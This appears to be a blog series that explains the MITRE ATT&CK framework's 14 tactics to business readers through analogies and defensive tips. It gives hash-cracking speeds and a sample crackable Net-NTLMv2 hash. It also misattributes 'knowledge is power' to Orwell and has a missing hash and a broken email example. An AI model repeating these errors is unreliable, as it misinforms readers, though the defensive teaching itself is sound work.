MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) Framework
There are 1000 things you can do with the MITRE ATT&CK Framework. However, since this is an introduction, we will just talk about the easy things. The first thing you need to be introduced to is the concept of TTP which stands for Tactics, Techniques, and Procedures. TTP is common military term as found in Joint Publication 1-02. Basically, it is like a funnel. Tactics are the broad considerations on what should be done like the General who wants to take the next hill. Techniques are more specific on how to achieve the goal such as using climbing skills to scale a cliff to get to the top of the hill. Procedures are how to tie the knots in the rope used to scale the cliff to take the hill.
In the MITRE ATT&CK Framework, there are 14 tactics. These are broad steps which need to be taken to effect a cyber-breach. Not all of them are done every time in the exact same order, but most of them are done most of the time. What we will do is go over each of the tactics, what they mean, and how they can affect your company or your employees. As George Orwell is fond of saying, “knowledge is power.”
When we get to an advanced level, we can use the combination of techniques to identify specific threat actors. What has been found is that when a group of hackers find something that works, they usually stick to it. That means when we see a group of techniques put together during a breach, it is likely it is the same group that used those techniques together last time. That said, one group can try to mimic the behavior of another group to try to blame them for the hack. However, that is spy-vs-spy stuff and your normal criminal hackers just want your money and don’t care as much that you know who they are.
Below are the 14 tactics described by the MITRE ATT&CK Framework. We will go through each one of them individually in a separate article linked below.
Reconnaissance is the first of 14 tactics used by hackers to attack your system. While not all tactics are used every time, a systematic review of each of these tactics in order will help to understand how to better defend your network.
Reconnaissance is kind of like the bear who went over the mountain. Most of this phase is where your company will not have any indication that they are being targeted. Hackers during this phase will try to collect information on your company usually without actually touching any of your resources. They may try to figure out who is hosting your website, which email service you use, what email accounts are available in the public record. Social media sites like LinkedIn are also scanned during this phase to see who is working for the company. Potential email addresses are formulated based on the patterns observed on the internet. If Karen Smith has an email firstname.lastname@example.org and Judith Jones is found to also work there, we can guess that Judith’s email is email@example.com.
As the last phase of reconnaissance, attackers will start their active scans. If they do this well, you will never notice you are being scanned. Think of it as two grocery stores selling the same candy at the checkout isle. Each wants to find out what price they are selling the candy for. Store A sends an employee in to stand in the checkout isle and spend 10 minutes writing down the name of the candy being sold and the price it is being sold for. When they do this, it is obvious what they are doing and it causes disruption, they get caught and banned from the store. Store B sends 20 employees over a week to each discover the name and price of one type of candy sold at the checkout line. They are never discovered and their intelligence helps them to undercut their competitors.
The same goes for scanning your firewall. If the scan is done from multiple places over a long period of time, you will never know you are being scanned. This is sometimes referred to as “low and slow”. If it is done very rapidly from one location, you can easily identify that you are being scanned and you can block the scan before it is complete.
It is also possible to be contacted by the hackers during this phase. In this case it is not for the purpose of stealing credentials, but solely to find out about the company. The hacker may pose as a job seeker and ask about the company, who the CEO is, where they are located, are there any satellite offices, and what the website is. These are all normal questions and answers are usually freely given. However, this helps the hackers build the profile of the company. They could then call back another employee, drop a name and ask for the number and name of helpdesk employees. This is all a form of social engineering, but still no credentials have been stolen yet, this is just building the dossier of information which will make the next phases easier to complete. Remember, it is perfectly fair game for a hacker to physically approach your company, socially engineer their way into the server room, and then steal everything you have without ever having breached the firewall. Social Engineering was Kevin Mitnick’s self-claimed best skill as portrayed in his book The Art of Deception and the movie Takedown released in 2000.
Resource development is the second of 14 tactics in the MITRE ATT&CK Framework.
This is where the hackers develop the tools, accounts, and platforms they will eventually attack your network with. If they are going to scan your network, they will need servers around the country to hide their efforts. This is where they may rent virtual machines on servers around the world which will alternately scan your network. Unfortunately, there is not much you can do during this phase of preparation by the hackers. This phase is where they may passively collect usernames and password for your employees. The dark web is full of password breaches and people often reuse passwords or portions of passwords. If one of your employees was a victim of a former breach , their current network password for your network may already be exposed.
If you are curious or concerned about whether or not your employees’ credentials have been leaked, there are a few services which can help you figure this out. One ishttps://haveibeenpwned.com/ which is run by Troy Hunt. This link will allow you to enter your email address and see if it has appeared in any dark web credential dumps. Troy has decoupled the passwords from the email addresses so this search will not turn up any passwords associated with those accounts. Troy also has another page on his website to look up passwords to see if they have been compromised, https://haveibeenpwned.com/Passwords.
Initial Access is the third tactic listed on the MITRE ATT&CK Framework. As mentioned before, these do not all need to happen in order, however, initial access does need to be up front as most of the tactics which follow on the matrix require initial access to first be achieved.
A hack is not a breach unless someone enters the system. Initial access is the first time a hacker enters your network. This can be done in a number of ways, but once it is done, the real danger has started. During the previous phases valid credentials which had been compromised were likely collected. Hackers can sometimes just login with these credentials. Oftentimes, this type of access cannot be differentiated from a valid login. Not always though. One way to check for valid logins is to use GeoIP. GeoIP is a method which determines where in the world someone is logging in from. If 100% of your users are from Pennsylvania and someone tries to log in from Asia with valid credentials then you have a good reason to be suspicious.
Another way into your networks is the age-old phishing scheme. Of course, phishing is when someone receives an email purporting to be someone else like Microsoft, eBay, or even your own helpdesk. The main goal of phishing is to steal someone’s credentials so again, the hacker can login in a way which looks valid to everyone who is looking. This is why employee education is so important. You can have $100,000 worth of firewalls and endpoint detection software and an unwitting employee can still compromise your network.
Don’t forget about physical security too. If a hacker can get into your building and plant a device on your network, then they really don’t need any unwitting employees to compromise the network. While port security on your routers will often work, physically disconnecting unused ports on the router is sometimes necessary to lock down rouge devices. This is not to dismiss actually hacking things like public facing web-apps or databases. Any port open on your firewall is a potential vulnerability and any vulnerability has the potential to be exploited by threat actors. Remember, your best chance to protect your network is to not allow initial access. Once they are inside your network, it becomes a lot harder to detect malicious activity and distinguish it from the hundreds or thousands of regular users on the network.
Execution is the fourth tactic on the MITRE ATT&CK Framework and is usually directly follows Initial Access. If you can somehow get access without execution, it will be hard to further the progression of the intrusion. So this tactic will always happen early in the breach of your network.
One someone is logged in the next thing they need to do is to run programs on your system. This may seem obvious, but not every method of entry onto the network will allow program execution. Imagine an unsecured CCTV camera or an unsecured printer. These devices may not allow program execution but may allow lateral movement. This is a good segue to the fact that the tactics on the MITRE ATT&CK framework may not go in a linear fashion. Execution is the fourth tactic on the framework chart but lateral movement is the tenth tactic. However, when the network intruder finds themselves on a device where they cannot execute programs, they have no choice but to move laterally which is sometimes called “island hopping.” But back to execution, there are many types of entry onto a network which do not provide a traditional login environment and the hacker needs to be creative on how they will execute programs on the devices they compromise. The hacker’s main goal at this stage is to what they term as “to pop a shell.” What this means is they want to somehow open the command line interpreter on your computer or server. This is the interface on your computer where you can run programs just by typing the name of the program and hitting the enter key. Once this is achieved, they can usually run programs which help them further own your machine.
Persistence is the fifth tactic listed on the MITRE ATT&CK Framework. It may not always be the fifth event to happen and in certain circumstances, it may not happen at all. However, most hackers will want to maintain access to a box they successfully penetrated.
Breaking into a computer is all fun and games right up until someone reboots that computer.
Oftentimes, if the hack is not complete, this will kick the hacker right off of the machine. In order to prevent being kicked off during a reboot, the hacker must establish persistence on your machine. In Microsoft Windows there are many normal techniques for a program to autorun at bootup or when the user logs in. You normally see this when you first log on and you see all of the icons start popping up in the bottom right hand side of your screen. These are usually programs that your IT group has established as necessary to operation your computer like your antivirus program and your battery life icon for your laptop. Hackers can place their malware in the exact same location and not even have an icon show up at the bottom of the screen. Since this is something that even regular users can do, the hacker does not need to be an administrator yet on your machine to use some of these techniques. If they can also promote themselves to an administrator, even more options open up on how to hide a persistence mechanism. Most mechanisms of persistence are housed somewhere in the operating system. This means that your IT department can often rescue your computer with a fresh install of the operating system over a wiped disk. However, sometimes the persistence mechanism is store in the hardware on your computer. More specifically, the malware can be stored in the firmware of the computer which runs before the operating system (like Microsoft Windows) loads. If the malware makes its way into the hardware, the only thing left to do is to replace the computer. This is a good reminder that poor cybersecurity costs money. Money not just in time, but potentially money in hardware too.
Privilege Escalation is the sixth of 14 tactics on the MITRE ATT&CK Framework. While some hacking and exfiltration tasks can be accomplished at the user level, the goal of most hackers is to gain administrative access to your computer.
The first level of elevation for a hacker is when they “pop a shell” on your computer. To “pop a shell” means to open a command line interface into your computer when they can then run programs remotely. However, some exploits only give the hacker user-level access to your computer or server. The true fist-pumping event is “getting root” on your machine. To “get root” means that the hacker has found a way to elevate their level of access to that of the administrator of the system. It is called “root” because that is the name of the administrator account on Linux and Unix operating systems. Most hackers use some version of the Linux operating system to conduct their attacks so it makes sense that they would use Linux terminology to describe their progress. Once the intruder successfully elevates privileges they can do many more things like disable and delete the internal mechanism that Microsoft Windows has for local backups (this is called volume shadow copies). This level of access is also necessary for ransomware to work effectively. Remember, ransomware not only encrypts your files, it encrypts everyone’s files. That kind of access to the computer usually requires administrative, or root level access. Unfortunately, once an attacker gains a foothold into your network, administrative access is usually not far behind. This means that stopping initial access is your best bet to stopping a hacker from totally owning your network.
Most people and companies have some type of protection set up on the computers they manage. Even Windows now comes pre-installed with Windows Defender which is both an anti-virus and an anti-malware product. So with these products installed on most every computer, hackers need to find away around these defensive measures. Defense Evasion is the seventh of 14 tactic on the MITRE ATT&CK Framework. It may not always be the seventh thing to happen during a breach but it almost always needs to happen.
If you look at the MITRE ATT&CK Framework you will see around 40 different techniques used under the Defense Evasion tactic. One of the easiest way to evade defenses is through the use of valid administrator credentials. Remember, administrators can usually turn off anti-virus programs which is the ultimate way to get around defenses. I am going to state something that seems obvious, but it will make sense it a minute. Antivirus programs can protect a computer as soon as it starts running but not before it starts running. In order to be most effective, antivirus programs usually start early in the boot process. However, if malware can start running before the antivirus program start, the malware can easily evade the antivirus program and even intercept procedure calls to the operating system.
Another way to evade defenses is through obfuscation. The way most simple antivirus programs work is through signature analysis. This means that a string of characters which is unique to each virus is stored in the antivirus program under definitions and each new program which is loaded onto the computer is scanned for a matching string of characters. Now if the hacker compresses or encodes the malware, this unique string of characters disappears and the antivirus program fails to identify the malware.
Two last techniques we will go over on this overview are Signed Binary Proxy Execution and Signed Script Proxy Execution. These are essentially the same thing. One way that Microsoft confirms that a program is valid is through digital certificates. Generally, if a program is digitally signed by Microsoft, then Microsoft Windows allows the program to run. This makes sense as only someone with Microsoft’s private key can sign a program or script as Microsoft. Public/private key encryption is a discussion for another day. Until then think of the private key as a signet ring used in Medieval through Victorian days to seal a letter with wax to authenticate the author of the letter. So back to that Microsoft signed program. In this case, Windows sees the Microsoft signature, validates it as genuine, and allows the program to run unhindered. The trick is that some of these programs can be used to spawn other programs. This is like using the shortstop to relay a throw to homeplate from the left fielder. In this case, the shortstop changes out the baseball to something malicious which then continues through the process as if the left-fielder had thrown the original ball. We may use that analogy again and change up what the shortstop does to the traffic, but that is for another article. We have only covered a few scenarios of defense evasion but there are many more ways to get around cyber defenses than listed here. A more complete list can be found athttps://attack.mitre.org.
Credential Access is the eighth tactic on the MITRE ATT&CK Framework. As mentioned before, this does not mean it is always the eighth event to happen during an attack. However, it is never the first. To access credentials on the network, you must first have some type of access to the network.
Operating systems store your password. There is no other way around it. When you want to log into your computer, you will need to present some kind of credential and the most common thing today is something you know which turns out to be your password. However, most operating systems today do not store your password in clear text. For example, Microsoft Windows stores your password with a cryptographic hash known as Message Digest 4 (MD4). For you techno-nerds, it is really the MD4 of the 16-byte Little-Endian Unicode of the password, but when using the western character set, this doesn’t change anything. For the uber-nerds, starting in version 1607, Microsoft encrypted that MD4 hash with AES. This is like putting a coded message in a lockbox. However, Microsoft stores the key to that lockbox in the SYSTEM registry so that is next to useless (for the cyber-savants, go here http://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/). Okay, back to MD4 hashes and your password. So let’s say that your password is “hashcat”, then your MD4 hash of your password is:
Once a hacker has access to your network there are many different ways this can be extracted for both local users and domain users. Now, MD4 is an extremely old and fast hashing algorithm. What this means in real life is that using a relatively old gaming graphics card, you can achieve over one billion password attempts per second once you have this hash. If we go back to our password math article here we can see that if we use only numbers, we can crack a nine character password in under a second (10^9 = 1 billion). If we use only lower case letters, we can crack a seven character password in eight seconds (26^7 = 8 billion). If we use uppercase and lowercase letters, we can crack a six character password in 19 seconds (52^6 = 19 billion). There is another way a hacker can get a hash of the password. While Microsoft stores passwords on the hard drive in an MD4 hash, they pass it around the network with an MD5 hash. While better than MD4, MD5 is still an older algorithm and can be cracked pretty fast on modern gaming graphics cards. An example of what is called Net-NTLMv2 is
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830 310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5 d765c783030
This may look complicated, but this also resolves to “hashcat” pretty easily because the MD5 hash is simply the part in red above. The other numbers are like salts to obfuscate the password before it is passed into the MD5 algorithm but this really doesn’t add too much to the time it takes to brute force the password. If you are further interested in the math behind this, you cyber-savants can go here https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 (if you go here, you will see that it is really HMAC-MD5, but we won’t distinguish the two here).
The last one we will talk about here are plain old unsecured credentials. Sometimes administrators like to use the command line to run certain programs. They do this because the can string certain commands together in what is called a script or a batch file. While it is bad practice to do so, some of these commands take username and password as arguments, especially if you need to log in to a database or elevate your privileges. The bad thing is that a lot of operating systems will keep a history of the commands that were run and now this clear-text history file contains usernames and passwords including, possibly, one to become the administrator of the computer or network.
Discovery is the ninth tactic listed on the MITRE ATT&CK Framework. This tactic will just about always happen because it describes the enumeration of your internal network. The vulnerable path which lead to the breach of you network may not be the most interesting computer on your network. Here is where the hackers find out which computer that may be.
So your network has been breached and the hacker is sitting on the first computer inside your network since the attack began. Imagine if you will someone sitting on a wall surrounding a city overlooking everything that is happening within that bustling metropolis. That is what the hacker will want to do once they have a foothold on the first machine. The first type of discovery can still be within that one computer by looking for files with important information in them like personally identifiable information (PII), personal health information (PHI), or banking/financial information. This can include browser history, bookmarks, and any running programs. At this point your keyboard is also susceptible to being captured so there goes your banking password (but this is a later tactic called Collection). However, it doesn’t stop there. Since this computer is connected to most, if not all, of the rest of the network, the hacker needs to see what is out there. This is like slowing down and looking at the traffic on the highway before you merge onto the interstate. The first thing they are likely to do is to do what is called a ping sweep. This is like playing Marco Polo in the swimming pool or more aptly, like a submarine sending out active sonar (remember Sean Connery in The Hunt for Red October “One ping only please” https://www.youtube.com/watch?v=jr0JaXfKj68). This can be done with tools built into Microsoft Windows.
Once the hacker finds other computers on the network they need to see what ports are open on those computers. Ports are like doors which allow programs running on a computer to talk to other computers. What is special about open ports on a computer is that they allow outside computers to initiate conversations which is usually not allowed. If you commonly use network file shares or mapped drives to store files on another server, you are using open ports on the server holding the files. That server is running a program which is listening and waiting for you to connect to it. The problem is that there are many ways on the network for the hacker to impersonate you to get to those files. As I have mentioned before, the best way to protect your network is to not let the hackers in to begin with. This responsibility lies with each and every employee in the company, not just the IT staff. Neither the staff accountant nor the CEO should think “Oh, it is okay to click on this link because the IT staff should be able to prevent any hacker from getting into our network.” Having confidence in your IT staff does not excuse carelessness. Script Kiddies, Hactivists, Organized Crime, and Nation-States are all after your money and intellectual properties. It is up to you to keep them out of your network, no matter your job title or job description.
Lateral Movement is the tenth of 14 tactics on the MITRE ATT&CK Framework. As stated before, this does not mean it is the tenth step that hackers take, but logically, this is later in the process. Lateral movement means jumping off of the initially hacked box and moving around the network. In order to do this, you have to have already hacked that first box.
Lateral movement is related to a technique called island hopping. They both involve moving around networks, but island hopping is where you compromise a smaller, less useful resource in order to get access to a larger, more attractive target network. This can be where you compromise a printer to get access to the file server. Most people don’t care whether or not you have access to a printer, what are you going to do, change the toner? However, a lot of the office printers today have a feature called scan-to-email or scan-to-fileserver. That means that the printer has some type of access to both the email server and fileserver. Island hopping can also refer to using an outside vendor to gain access to your network; one which has access to your network like the HVAC vendor did for the Target breach in 2013 (https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/).
Remember, the hacker is inside your computer at this point. They are not only sitting on the internal network looking for places to go, they also likely have full access to your email account. With this access they can send out emails to others while pretending to be you. This can have severe consequences depending on whose computer has been hacked. If you are the summer intern, there is not much the hacker can do with your email except send out other emails with malicious attachments in it. This is called internal spearphishing. Maybe they can ask someone for a spreadsheet of everyone in the company with their phone numbers. Maybe they can ask for the names of someone on the IT helpdesk. If you think creatively, email from this level of employee can still be dangerous because even the summer intern is a trusted insider. Now switch to the scenario where the CFO or CEO gets hacked. The bank now starts getting emails to wire money overseas and fulfills the requests because the email is coming from someone with authority to make those requests. Basically, once inside, the hackers can set up basecamp on your computer and forage out from there through the entire network. This is why ongoing cybersecurity is so important and is so much more than just the annual phishing training
The Collection tactic is the eleventh tactic in the MITRE ATT&CK Framework. As stated before, this does not mean it is the eleventh thing to happen during an attack, it just means that a few things have to happen before the hacker can start gathering data. This includes the initial compromise and then navigating to where the important data is.
The idea that most people have is that hackers break into their computer and steal stuff. That is true, but they can’t just steal everything. They have to be selective on what they take. If they try to take a bit-for-bit image of your hard drive, not only would that take a very long time, it would likely be noticed by an alert cybersecurity program. Instead, the cyber criminals will often be very particular on what they eventually steal. I say eventually because they have to gather what they want before they ship it off home. You can think of it as the traditional burglar with a black sack which is being filled with money and jewels from the safe of an old mansion. You can also think of it as moving day where you fill boxes with your important papers so you can more easily carry them to your new house instead of carrying them folder by folder. In any event, collection is the capture and packaging of data important to the hackers. This can be audio data of a board meeting captured through your microphone. This can be webcam data captured from the laptop in the conference room. This can be keystrokes from your keyboard when you log into your online banking website. This can be a dump of client information from your retail database. Anything the computer interacts with can be captured.
Some networks have data loss prevention (DLP) programs running which inspect packets leaving the network to look for sensitive data. This is great if the data going out is unencrypted. However, what happens if the hackers put all of the data they collected into an encrypted RAR or ZIP file? How will the DLP program be able to inspect that encrypted file? The answer is, it cannot. The only thing it can do is prevent files over a certain size to be exfiltrated off of the computer or stop all transfers when a certain upload data limit has been reached. Other than that, if the hackers have locked their black bags full of your data, it will be hard to stop them from getting that data off of your network. If encrypted files are rare in your computing environment, setting up a scan for large encrypted files might identify a clandestine collection event happening right now. Otherwise, if the hackers have gotten to this stage in the process without being detected then the chances are low that you will stop them now with the tools you have in place.
Command and Control is the twelfth of 14 tactics on the MITRE ATT&CK Framework. As with the previous tactics we have covered, this does not mean it is the twelfth step in the process. What this means is that it is a later step in the process. This is the “ET Phone Home” step in the process. Depending on how the network breach occurred, this can actually be much earlier in the process than twelfth.
Warning, I am going to say something that sounds obvious. Sometimes a hack is caused by a hacker. What do I mean by that? Well, what I mean is that sometimes there is someone behind the keyboard on one computer trying to actively hack into your computer. However, this is not always the case. Sometimes the process is completely automated. When a phishing attack goes out, it will go out to hundreds or thousands of people at a time. This is especially true if it is a spearphishing attack aimed at your company. If just one person clicks on the link and eventually downloads malware, that malware has to be able to tell the hacker that it successfully installed itself. This is a “if a tree falls in the woods” type of scenario. If you download and install malware on your computer but the hacker never finds out, did it really happen? With the enormity of the Internet, that malware has to phone home to tell the hacker it is alive and waiting for them to connect to it. Well, we have reached the level of sophistication at this point that the system doesn’t just send an email to one hacker, it actually logs into a complex command and control infrastructure to be registered and await further instruction. One of the tricks is to obscure that command and control traffic so it is not obvious to the defenders what it is. Sometimes the command and control traffic will disguise itself as regular web traffic since most web requests originating from inside the network is automatically deemed allowable traffic.
Another thing that a command and control infrastructure can do is to download additional payloads. This means that the usually small piece of malware which initially got installed on your computer can now download larger, more complex pieces of malware which can do additional things. One thing it can do is to download an entire mail sending program complete with huge email address books and turn your computer into a spam bot. Now your computer can be acting on behalf of the hacker by sending out more phishing emails which perpetuate the cycle. Whatever happens after the command and control system is contacted, it is one more step in the process of losing all of your data, intellectual property, and even your money.
Exfiltration is thirteenth of 14 tactics on the MITRE ATT&CK framework. While not always the thirteenth event to happen during a hack, it is one of the last things that happens during a breach. Even a ransomware attacker will steal files on the event that you will not pay to decrypt your files, you may pay to not have your files released on the internet.
Exfiltration is the actual moving of your data off of your network. That movement can be directly to the hacker’s machine or to some intermediate repository. That intermediate location can actually be someone else’s hacked machine, but it is usually a cloud machine they own that is in the same country so your system doesn’t raise a flag that you are suddenly sending gigabytes of data overseas. The biggest hurdle that the hackers have to overcome is that most networks are set up to detect large data transfers. So the trick is to disguise these large data transfers as something else. Some hackers have even hidden exfiltration in DNS traffic which is talked about here (https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-data-exfiltration-and-dns-closing-the-back-door.pdf).
If we look back to collections, it is likely that there are large encrypted RAR or ZIP files sitting somewhere on your network and these are the files that are being transported off of your network. If we are up to this stage of the cyber breach, this is the last chance you have to protect your data before it is gone forever. We touched on GEOIP earlier in the series under Initial Access. If you recall, GEOIP is a service which will tell you where in the world an IP is located. Each computer, or groups of computers, are assigned an IP address in order to communicate on the internet. While not a perfect system, blocks or ranges of those IP addresses are assigned to companies who list addresses in different parts of the world. This system is usually good enough to say whether or not an IP address is located in the same country as your business. The question you have to ask yourself is whether or not your users should be uploading gigabytes of data to a foreign IP address at 3am local time. If this is not normal behavior, it may be a clue that something is going on. However, 3am traffic with our remote workforce may not be that strange in today’s environment. What to look for is the direction of the traffic (uploading or downloading) and the location of the computer receiving the data. Once we know what normal looks like, only then can we declare something abnormal.
Impact is the last tactic on the MITRE ATT&CK Framework. This tactic can also be named “destructive techniques” as that is exactly what most of them are. The technique that most people are aware of is ransomware where the hackers will encrypt your files and ask you to pay a ransom to potentially get the decryption key.
Ransomware is popular because that is a way the hackers can gather money since most people have a willingness to pay. Originally, hackers were going after personal computers and asking for $200 to $500 per computer. Now, hackers are targeting corporations and asking for millions of dollars. Almost nothing appears to be off limits. This can be seen from multiple hospitals being targeted with ransomware and the ransom still being mandated (https://www.wsj.com/articles/the-ruthless-cyber-gang-behind-the-hospital-ransomware-crisis-11623340215). However, things were thought to have changed during the Colonial Pipeline hack which shut down the gasoline pipeline for most of the East Coast of the United States (https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/). When the hackers responsible for the breach closed down their online presence and the pipeline company was reportedly in possession of the decryption tool, some thought that they gave into online pressure that the hack was too sensitive and shouldn’t have attacked critical infrastructure. Others thought it still might be a hoax (https://www.washingtonpost.com/technology/2021/05/14/darkside-ransomware-shutting-down/). However, it was later reported that Colonial paid $5M in ransom to get the decryption tool and the hackers who shut down their website were just happy with their money (https://www.zdnet.com/article/colonial-pipeline-paid-close-to-5-million-in-ransomware-blackmail-payment/). The ironic thing was that while the decryption tool did work, it was so slow that it was faster to recover from offline backups the company had. At the end of the day you data will be stolen, encrypted, or destroyed as the result of a cyber breach. The question becomes whether or not your reputation can handle the consequences of poor cyber hygiene.